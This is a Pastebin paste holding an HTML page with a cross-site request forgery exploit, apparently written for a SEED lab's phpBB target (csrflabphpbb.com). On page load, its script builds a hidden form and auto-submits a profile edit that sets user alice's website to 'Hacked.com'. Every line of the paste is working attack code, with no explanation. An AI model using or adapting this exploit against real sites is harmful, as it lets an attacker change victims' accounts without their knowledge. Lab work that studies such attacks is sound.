Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><body><h1>
- Javascript </h1>
- <script type="text/javascript">
- function post (url,fields)
- {
- var p = document.createElement('form');
- p.action = url;
- p.innerHTML = fields;
- p.target = '_self';
- p.method = 'post';
- document.body.appendChild(p);
- p.submit();
- }
- function csrf_hack()
- {
- var fields;
- fields +="<input type='hidden' name='username' value='alice'>";
- fields +="<input type='hidden' name='email' value='alice%40seed.com'>";
- // fields +="<input type='hidden' name='cur_password' value=''>";
- // fields +="<input type='hidden' name='new_password' value=''>";
- // fields +="<input type='hidden' name='password_confirm' value=''>";
- // fields +="<input type='hidden' name='icq' value=''>";
- // fields +="<input type='hidden' name='aim' value=''>";
- // fields +="<input type='hidden' name='msn' value=''>";
- // fields +="<input type='hidden' name='yim' value=''>";
- fields +="<input type='hidden' name='website' value='Hacked.com'>";
- // fields +="<input type='hidden' name='location' value='World'>";
- // fields +="<input type='hidden' name='occupation' value=''>";
- // fields +="<input type='hidden' name='interests' value='Hacking'>";
- // fields +="<input type='hidden' name='signature' value=''>";
- // fields +="<input type='hidden' name='viewemail' value='0'>";
- // fields +="<input type='hidden' name='hideonline' value='0'>";
- // fields +="<input type='hidden' name='notifyreply' value='0'>";
- // fields +="<input type='hidden' name='notifypm' value='1'>";
- // fields +="<input type='hidden' name='popup_pm' value='1'>";
- // fields +="<input type='hidden' name='attachsig' value='1'>";
- // fields +="<input type='hidden' name='allowbbcode' value='1'>";
- // fields +="<input type='hidden' name='allowhtml' value='0'>";
- // fields +="<input type='hidden' name='allowsmilies' value='1'>";
- // fields +="<input type='hidden' name='language' value='english'>";
- // fields +="<input type='hidden' name='style' value='1'>";
- // fields +="<input type='hidden' name='timezone' value='0'>";
- // fields +="<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
- // fields +="<input type='hidden' name='mode' value='editprofile'>";
- fields +="<input type='hidden' name='agreed' value='true'>";
- fields +="<input type='hidden' name='coppa' value='0'>";
- fields +="<input type='hidden' name='user_id' value='3'>";
- fields +="<input type='hidden' name='current_email' value='alice%40seed.com'>";
- fields +="<input type='hidden' name='Submit' value='Submit'>";
- fields +="<input type='hidden' name='reset' class='liteoption'/>";
- post('http://www.csrflabphpbb.com/',fields);
- }
- window.onload = function() {csrf_hack();}
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement